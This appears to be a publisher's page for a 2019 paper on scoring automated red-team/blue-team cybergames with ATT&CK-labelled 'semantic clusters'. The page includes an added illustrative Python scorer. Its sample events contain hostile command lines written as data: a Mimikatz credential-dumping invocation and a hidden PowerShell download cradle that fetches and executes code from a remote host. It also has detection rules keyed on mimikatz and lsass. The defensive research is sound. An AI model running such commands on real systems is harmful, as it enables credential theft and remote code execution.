
Closing the Gap with APTs Through Semantic Clusters and Automated Cybergames

  • Conference paper
  • Security and Privacy in Communication Networks (SecureComm 2019)

Abstract

Defenders spend significant time interpreting low-level events while attackers, especially Advanced Persistent Threats (APTs), think and plan their activities at a higher strategic level. In this paper, we close this semantic gap by making the attackers’ strategy an explicit machine-readable component of intrusion detection. We introduce the concept of semantic clusters, which combine high-level technique and tactic annotations with a set of events providing evidence for those annotations. We then use a fully automated cybergaming environment, in which a red team is programmed to emulate APT behavior, to assess and improve defensive posture. Semantic clusters both provide the basis of scoring these cybergames and highlight promising defensive improvements. In a set of experiments, we demonstrate effective defensive adjustments which can be made using this higher-level information about adversarial strategy.


Notes

  1. https://attack.mitre.org/wiki/Main_Page.

  2. Ancillary techniques are used because of some semantic overlap in ATT&CK. For example, using a PowerShell command to dump credentials (T1003) could also be correctly labeled as an instance of execution via PowerShell (T1086).

  3. Note that blue can report on the same red activity more than once if multiple sensors detect different aspects of the same red action. In this case, we count only one true positive.

  4. We can apply the blue bot repeatedly to the same red activity because the blue bot does not alter the gameboard.
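
The semantic-cluster idea from the abstract, together with the scoring rule in note 3 and the gap analysis the abstract promises ("highlight promising defensive improvements"), written out as an added Python example. This is constructed for illustration; it is not code from the paper or from the BRAWL, CALDERA or CASCADE tooling it acknowledges. The event layout, the toy blue-bot detection rules, the sample events, the red-bot ground truth and the technique IDs used as labels are all assumptions.

```python
"""Added example (not from the paper): semantic clusters and cybergame scoring.

Event layout, the toy blue-bot rules, the sample events and the red-bot
ground truth are all constructed for illustration.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple


@dataclass(frozen=True)
class Event:
    """One low-level sensor event (constructed, Sysmon/EDR-like)."""
    event_id: str
    sensor: str
    host: str
    process: str
    command_line: str
    red_action: str  # red-bot ground-truth label used for scoring; "" if benign


@dataclass
class SemanticCluster:
    """A technique/tactic annotation plus the events that are evidence for it."""
    technique: str                                    # primary ATT&CK technique ID
    tactic: str
    ancillary: Set[str] = field(default_factory=set)  # overlapping techniques (note 2)
    evidence: List[Event] = field(default_factory=list)


# Constructed red-bot ground truth: action id -> (primary technique, tactic).
RED_GROUND_TRUTH: Dict[str, Tuple[str, str]] = {
    "red-01": ("T1003", "credential-access"),  # credential dumping via PowerShell
    "red-02": ("T1086", "execution"),          # hidden-window PowerShell download cradle
    "red-03": ("T1053", "persistence"),        # scheduled task; no sensor sees it here
}

# Constructed sample events: two sensors see red-01 (note 3), e3/e4 are benign,
# e5 is red-02 seen by Sysmon but missed by the rules below, red-03 has no event.
SAMPLE_EVENTS: List[Event] = [
    Event("e1", "sysmon", "ws01", "powershell.exe", "powershell -c Invoke-Mimikatz", "red-01"),
    Event("e2", "edr", "ws01", "lsass.exe", "", "red-01"),
    Event("e3", "sysmon", "ws01", "powershell.exe", "powershell -c Get-Date", ""),
    Event("e4", "sysmon", "ws02", "powershell.exe", "powershell -enc SQBFAFgA", ""),
    Event("e5", "sysmon", "ws02", "powershell.exe",
          "powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')",
          "red-02"),
]


def blue_bot(events: List[Event]) -> List[SemanticCluster]:
    """Toy detection logic: raw events in, semantic clusters out.

    A pure function of the events (it never alters the gameboard), so it can
    be re-run against the same red activity as often as needed (note 4).
    """
    clusters: List[SemanticCluster] = []
    for ev in events:
        cmd = ev.command_line.lower()
        if "mimikatz" in cmd or ev.process == "lsass.exe":
            cluster = SemanticCluster("T1003", "credential-access", evidence=[ev])
            if ev.process == "powershell.exe":
                cluster.ancillary.add("T1086")  # the same action is also PowerShell execution
            clusters.append(cluster)
        elif ev.process == "powershell.exe" and "-enc" in cmd:
            clusters.append(SemanticCluster("T1086", "execution", evidence=[ev]))
    return clusters


def score(clusters: List[SemanticCluster],
          ground_truth: Dict[str, Tuple[str, str]]) -> Dict[str, object]:
    """One true positive per red action however many clusters or sensors report
    it (note 3); a cluster with no red evidence is a false positive; a red
    action that no cluster explains is a false negative."""
    detected: Set[str] = set()
    false_positives = 0
    for cluster in clusters:
        red_hits = {ev.red_action for ev in cluster.evidence if ev.red_action}
        if not red_hits:
            false_positives += 1
            continue
        for action in red_hits:
            primary, _tactic = ground_truth[action]
            if primary == cluster.technique or primary in cluster.ancillary:
                detected.add(action)
    return {"tp": len(detected), "fp": false_positives,
            "fn": len(set(ground_truth) - detected), "detected": sorted(detected)}


def gaps(events: List[Event], clusters: List[SemanticCluster],
         ground_truth: Dict[str, Tuple[str, str]]) -> Dict[str, str]:
    """Make each miss actionable: 'sensor' if no event carries the action's
    label (add telemetry), 'analytic' if events exist but no matching cluster
    was formed (improve the detection rules)."""
    detected = set(score(clusters, ground_truth)["detected"])
    observed = {ev.red_action for ev in events if ev.red_action}
    return {action: ("analytic" if action in observed else "sensor")
            for action in sorted(set(ground_truth) - detected)}


if __name__ == "__main__":
    found = blue_bot(SAMPLE_EVENTS)
    print(score(found, RED_GROUND_TRUTH))                # tp 1, fp 1, fn 2
    print(gaps(SAMPLE_EVENTS, found, RED_GROUND_TRUTH))  # red-02 analytic, red-03 sensor
```

Two details carry the paper's point. First, the scorer keys on red actions rather than on alerts: red-01 produces two clusters from two sensors yet counts once, so a noisier blue bot cannot inflate its score. Second, the gap report separates misses a new sensor would fix from misses a better analytic would fix, which is the kind of targeted defensive adjustment the abstract refers to.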

References

  1. ATT&CK: Adversarial Tactics, Techniques, and Common Knowledge. https://attack.mitre.org. Accessed 24 Apr 2019

  2. CAPEC: Common Attack Pattern Enumeration and Classification. https://capec.mitre.org. Accessed 24 Apr 2019

  3. CASCADE. https://github.com/mitre/cascade-server. Accessed 30 Apr 2019

  4. Cyber Analytics Repository. https://car.mitre.org/data_model/. Accessed 24 Apr 2019

  5. Endgame RTA: Red Team Automation. https://www.endgame.com/blog/technical-blog/introducing-endgame-red-team-automation. Accessed 24 Apr 2019

  6. First Round of MITRE ATT&CK Product Evaluations Released. https://medium.com/mitre-attack/first-round-of-mitre-att-ck-evaluations-released-15db64ea970d. Accessed 24 Apr 2019

  7. Mandiant: APT1: Exposing One of China’s Cyber Espionage Units. https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf. Accessed 24 Apr 2019

  8. NSA/CSS Technical Cyber Threat Framework v2. https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/ctr-nsa-css-technical-cyber-threat-framework.pdf. Accessed 24 Apr 2019

  9. Red Canary ATT&CKs (Part 1): Why We’re Using ATT&CK Across Red Canary. https://redcanary.com/blog/red-canary-and-mitre-attack/. Accessed 24 Apr 2019

  10. SwiftOnSecurity: Sysmon config. https://github.com/SwiftOnSecurity/sysmon-config. Accessed 24 Apr 2019

  11. Sysmon 9.0. https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon. Accessed 24 Apr 2019

  12. Elastic Common Schema (ECS). https://github.com/elastic/ecs/tree/master/schemas. Accessed 24 Apr 2019

  13. The Pyramid of Pain. http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html. Accessed 24 Apr 2019

  14. The SOC Gets a Makeover. https://www.darkreading.com/risk/the-soc-gets-a-makeover/d/d-id/1332744/. Accessed 24 Apr 2019

  15. Applebaum, A., Miller, D., Strom, B., Foster, H., Thomas, C.: Analysis of automated adversary emulation techniques. In: Summer Simulation Multi-Conference, p. 16 (2017)

  16. Applebaum, A., Miller, D., Strom, B., Korban, C., Wolf, R.: Intelligent, automated red team emulation. In: 32nd Annual Conference on Computer Security Applications (ACSAC), pp. 363–373. ACM (2016)

  17. Bodeau, D., McCollum, C., Fox, D.: Cyber threat modeling: survey, assessment, and representative framework. Tech. Rep. 16-J-00184-01, The MITRE Corporation, Homeland Security Systems Engineering and Development Institute (April 2018)

  18. Ferguson, B., Tall, A., Olsen, D.: National Cyber Range overview. In: IEEE Military Communications Conference (MILCOM) 2014, pp. 123–128. IEEE (2014)

  19. Fletcher, T.A., Sharp, C., Raghavan, A.: Optimized common information model. US Patent App. 14/800,678 (2016)

  20. Fox, D., McCollum, C., Arnoth, E., Mak, D.: Cyber wargaming: framework for enhancing cyber wargaming with realistic business context. Tech. Rep. 16-J-00184-04, The MITRE Corporation, Homeland Security Systems Engineering and Development Institute (November 2018)

  21. Goldis, P.D.: Questions and answers about tiger teams. EDPACS 17(4), 1–10 (1989)

  22. Hoffmann, J.: Simulated penetration testing: from Dijkstra to Turing Test++. In: 25th International Conference on Automated Planning and Scheduling (ICAPS) (2015)

  23. Huang, X., Alleva, F., Hon, H.W., Hwang, M.Y., Lee, K.F., Rosenfeld, R.: The SPHINX-II speech recognition system: an overview. Comput. Speech Lang. 7(2), 137–148 (1993)

  24. Kewley, D.L., Bouchard, J.F.: DARPA Information Assurance Program dynamic defense experiment summary. IEEE Trans. Syst. Man Cybern. A Syst. Hum. 31(4), 331–336 (2001)

  25. Milajerdi, S.M., Gjomemo, R., Eshete, B., Sekar, R., Venkatakrishnan, V.: HOLMES: real-time APT detection through correlation of suspicious information flows. In: 2019 IEEE Symposium on Security and Privacy, pp. 430–445. IEEE (2019)

  26. Niculae, S.: Reinforcement learning vs. genetic algorithms in game-theoretic cyber-security. Thesis Commons (October 2018). https://thesiscommons.org/nxzep

  27. Oakley, J.: Improving cyber defensive stratagem through APT-centric offensive security assessment. In: International Conference on Cyber Warfare and Security, pp. 552–XV. Academic Conferences International Limited (2018)

  28. Oltsik, J., Alexander, C.: The life and times of cybersecurity professionals. ESG and ISSA Research Report (2017)

  29. Ošlejšek, R., Toth, D., Eichler, Z., Burská, K.: Towards a unified data storage and generic visualizations in cyber ranges. In: 16th European Conference on Cyber Warfare and Security, p. 298. Academic Conferences and Publishing International Limited (2017)

  30. Passerini, E., Paleari, R., Martignoni, L.: How good are malware detectors at remediating infected systems? In: Flegel, U., Bruschi, D. (eds.) DIMVA 2009. LNCS, vol. 5587, pp. 21–37. Springer, Heidelberg (2009). https://doi.org/10.1007/978-3-642-02918-9_2

  31. Rieck, K., Trinius, P., Willems, C., Holz, T.: Automatic analysis of malware behavior using machine learning. J. Comput. Secur. 19(4), 639–668 (2011)

  32. Rossey, L.: SimSpace cyber range. In: ACSAC 2015 Panel: Cyber Experimentation of the Future (CEF): Catalyzing a New Generation of Experimental Cybersecurity Research (2015)

  33. Rossey, L.M., et al.: LARIAT: Lincoln Adaptable Real-time Information Assurance Testbed. In: IEEE Aerospace Conference, vol. 6. IEEE (2002)

  34. Sarraute, C., Buffet, O., Hoffmann, J.: POMDPs make better hackers: accounting for uncertainty in penetration testing. In: 26th AAAI Conference on Artificial Intelligence (2012)

  35. Silver, D., et al.: Mastering the game of Go with deep neural networks and tree search. Nature 529(7587), 484–489 (2016)

  36. Sommer, R., Paxson, V.: Outside the closed world: on using machine learning for network intrusion detection. In: 2010 IEEE Symposium on Security and Privacy, pp. 305–316. IEEE (2010)

  37. Trinius, P., Willems, C., Holz, T., Rieck, K.: A malware instruction set for behavior-based analysis (2009)

  38. Van Dijk, M., Juels, A., Oprea, A., Rivest, R.L.: FlipIt: the game of “stealthy takeover”. J. Cryptol. 26(4), 655–713 (2013)

  39. Wagner, D., Soto, P.: Mimicry attacks on host-based intrusion detection systems. In: 9th ACM Conference on Computer and Communications Security (CCS), pp. 255–264. ACM (2002)

  40. Wood, B.J., Duggan, R.A.: Red teaming of advanced information assurance concepts. In: DARPA Information Survivability Conference and Exposition (DISCEX), pp. 112–118. IEEE (2000)


Acknowledgements

We would like to thank Andy Applebaum for his helpful comments and suggestions reviewing this manuscript. We also want to acknowledge the generous support provided by the BRAWL, CALDERA, and CASCADE teams. This work was supported by a grant from the MITRE Innovation Program.

Author information

Corresponding author: Steven Gianvecchio.


Copyright information

© 2019 ICST Institute for Computer Sciences, Social Informatics and Telecommunications Engineering

About this paper


Cite this paper

Gianvecchio, S., Burkhalter, C., Lan, H., Sillers, A., Smith, K. (2019). Closing the Gap with APTs Through Semantic Clusters and Automated Cybergames. In: Chen, S., Choo, KK., Fu, X., Lou, W., Mohaisen, A. (eds) Security and Privacy in Communication Networks. SecureComm 2019. Lecture Notes of the Institute for Computer Sciences, Social Informatics and Telecommunications Engineering, vol 304. Springer, Cham. https://doi.org/10.1007/978-3-030-37228-6_12


  • DOI: https://doi.org/10.1007/978-3-030-37228-6_12


  • Publisher Name: Springer, Cham

  • Print ISBN: 978-3-030-37227-9

  • Online ISBN: 978-3-030-37228-6

  • eBook Packages: Computer Science (R0)
